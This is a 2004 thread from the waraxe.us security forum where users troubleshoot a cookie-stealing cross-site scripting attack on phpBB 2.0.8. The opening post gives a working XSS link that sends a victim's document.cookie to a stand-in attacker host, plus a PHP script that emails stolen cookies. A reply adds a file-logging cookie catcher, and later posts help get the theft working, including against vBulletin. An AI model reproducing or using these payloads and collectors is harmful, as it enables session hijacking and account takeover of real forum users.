Waraxe IT Security Portal
Login or Register
November 17, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 88
Members: 0
Total: 88
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS phpBB 2.0.8
Post new topicReply to topic View previous topic :: View next topic
XSS phpBB 2.0.8
PostPosted: Sun Sep 19, 2004 12:34 am Reply with quote
Nicolas
Regular user
Regular user
Joined: Sep 19, 2004
Posts: 10




Hi All
Thx for your forum, it's very good Wink

I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034


I write this link:

Code:
http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil


and my code_evil.php is:
Code:
<?php

$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);

?>


But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please Idea
View user's profile Send private message
PostPosted: Sun Sep 19, 2004 2:33 am Reply with quote
Dark Dragon
Regular user
Regular user
Joined: Aug 26, 2004
Posts: 11




i don't like emailer scripts personnaly

id prefer


Code:

<?php
$fp = fopen('logger.txt','a'); // open to append
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>


and logger.txt (chmodded 777)

_________________
Coding Support Central
View user's profile Send private message
PostPosted: Sun Sep 19, 2004 7:09 pm Reply with quote
Nicolas
Regular user
Regular user
Joined: Sep 19, 2004
Posts: 10




Thx for your script, it's nice methode Wink

But did you know why my script don't work ?
View user's profile Send private message
Re: XSS phpBB 2.0.8
PostPosted: Sun Sep 19, 2004 8:25 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Nicolas wrote:
Hi All
Thx for your forum, it's very good Wink

I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034


I write this link:

Code:
http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil


and my code_evil.php is:
Code:
<?php

$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);

?>


But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please Idea


You don't receive email at all, or you receive email without cookie?
If you don't get email at all, then there can be problem with spam
filters and it's related to server, in which you use "mail()" function.
I have encountered many servers, that are "banned" from hotmail.com
and mails are just not getting through ...
View user's profile Send private message Send e-mail Visit poster's website
aa
PostPosted: Mon Sep 20, 2004 8:45 pm Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




Always check your Junk E-Mail.. Wink

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Wed Sep 22, 2004 3:23 pm Reply with quote
Nicolas
Regular user
Regular user
Joined: Sep 19, 2004
Posts: 10




I didn't receive emails and I thank again the problem is a filters problem not a code problem
The email to receive is hotmail
I will test with an other email
Thx for all
I will post my results Wink
View user's profile Send private message
PostPosted: Sun Jan 16, 2005 7:24 pm Reply with quote
Injector
Active user
Active user
Joined: Dec 29, 2004
Posts: 49




hey can anyone help me Im having the same problem I used the php script
which sends the cookie to your email address. I receive the cookie but its
empty though. what did i do wrong or do i have to add anything else?

I'm doing it on vbulletin using some exploit on [IMG tags
View user's profile Send private message
XSS phpBB 2.0.8
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.065 Seconds